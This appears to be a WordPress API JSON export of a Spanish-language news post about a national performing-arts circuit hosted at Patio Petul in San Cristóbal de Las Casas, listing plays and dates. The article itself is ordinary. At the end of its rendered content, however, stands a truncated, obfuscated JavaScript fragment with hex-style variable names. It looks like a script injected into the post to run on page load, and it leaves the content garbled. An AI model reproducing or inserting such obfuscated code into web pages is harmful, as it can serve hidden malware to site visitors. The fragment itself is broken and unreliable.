{"id":5635,"date":"2022-10-05T02:54:36","date_gmt":"2022-10-05T02:54:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5635"},"modified":"2022-10-05T02:54:37","modified_gmt":"2022-10-05T02:54:37","slug":"san-cristobal-sede-del-circuito-nacional-de-artes-escenicas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5635","title":{"rendered":"San Crist\u00f3bal, sede del Circuito Nacional de Artes Esc\u00e9nicas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"723\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221004-WA0094-723x1024.jpg\" alt=\"\" class=\"wp-image-5636\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221004-WA0094-723x1024.jpg 723w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221004-WA0094-212x300.jpg 212w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221004-WA0094-768x1087.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221004-WA0094.jpg 904w\" sizes=\"auto, (max-width: 723px) 100vw, 723px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal San Crist\u00f3bal de Las Casas.- Por segunda ocasi\u00f3n esta ciudad es sede del Circuito Nacional de Artes Esc\u00e9nicas en Espacios Independientes que promueve la Secretar\u00eda de Cultura, lo cual se llevar\u00e1 a cabo en el Foro Patio Petul.Al respecto, Lupita Calvo dio a conocer que este proyecto se da a trav\u00e9s del Centro Cultural Hel\u00e9nico y como parte del proyecto Chapultepec, Naturaleza y Cultura, el cual busca llevar las artes esc\u00e9nicas a todos los estados de la Rep\u00fablica Mexicana. \u201cPara ello se forman circuitos entre tres o m\u00e1s estados. En Chiapas se presentar\u00e1n obras locales, de Tuxtla y San Crist\u00f3bal, adem\u00e1s que nos visitan compa\u00f1\u00edas de Oaxaca y Xalapa. En San Crist\u00f3bal de Las Casas es Patio Petul el foro independiente que recibe a estas compa\u00f1\u00edas\u201d, coment\u00f3.Coment\u00f3 que este fin de semana se present\u00f3 la obra \u201cTres d\u00edas para volar\u201d, de la compa\u00f1\u00eda Cocuyo Teatro; \u201cChikoo: el ni\u00f1o que no quer\u00eda ser perro\u201d de la compa\u00f1\u00eda La maleta Teatro tendr\u00e1 lugar el 7,8 y 9 de octubre; \u201cOsos de la noche\u201d, de Maldito Teatro estar\u00e1 el 28 de octubre; y el 1 y 2 de noviembre Ni\u00f1as de la guerra, del colectivo teatral Dionisiacas. \u201cTambi\u00e9n habr\u00e1n dos obras para j\u00f3venes y adultos, en las fechas 14,15 y 16 de octubre se presenta \u201cOliva Olivo: adicta a los patanes\u201d; y \u201cCasquito\u201d estar\u00e1 el 21 y 22 de octubre. Para mayor informaci\u00f3n, consultar la p\u00e1gina de Patio Petul\u201d.&#8221;Hay un costo de entrada general de 100 pesos pero estamos obsequiando entradas libres. Los interesados nos pueden escribir en Facebook en nuestra p\u00e1gina que se llama Patio Petul\u201d, agreg\u00f3.Asimismo, dijo que Patio Petul es un foro itinerante en San Crist\u00f3bal de Las Casas, que se encuentra ubicado en un espacio de poco aforo, pero para recibir a compa\u00f1\u00edas que presentan obras en gran formato, \u201co cuando tenemos festivales, nos instalamos en alg\u00fan lugar accesible para el p\u00fablico y lo m\u00e1s adaptado posible para los espect\u00e1culos que recibimos\u201d. Finalmente, aclar\u00f3 que el foro esc\u00e9nico que ella coordina se encuentra en el Barrio de Santa Luc\u00eda, pero en esta ocasi\u00f3n el foro se traslada a la direcci\u00f3n Mar\u00eda Adelina Flores n\u00famero 12, en las instalaciones de La Peregrina, que cuenta con un sal\u00f3n amplio adecuado para las presentaciones.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal San Crist\u00f3bal de Las Casas.- Por segunda ocasi\u00f3n esta ciudad es sede del Circuito Nacional de Artes Esc\u00e9nicas en Espacios Independientes que promueve la Secretar\u00eda de Cultura, lo cual se llevar\u00e1 a cabo en el Foro Patio Petul.Al respecto, Lupita Calvo dio a conocer que este proyecto se da a trav\u00e9s del &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5636,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-5635","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5635","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5635"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5635\/revisions"}],"predecessor-version":[{"id":5637,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5635\/revisions\/5637"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5636"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5635"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5635"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5635"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}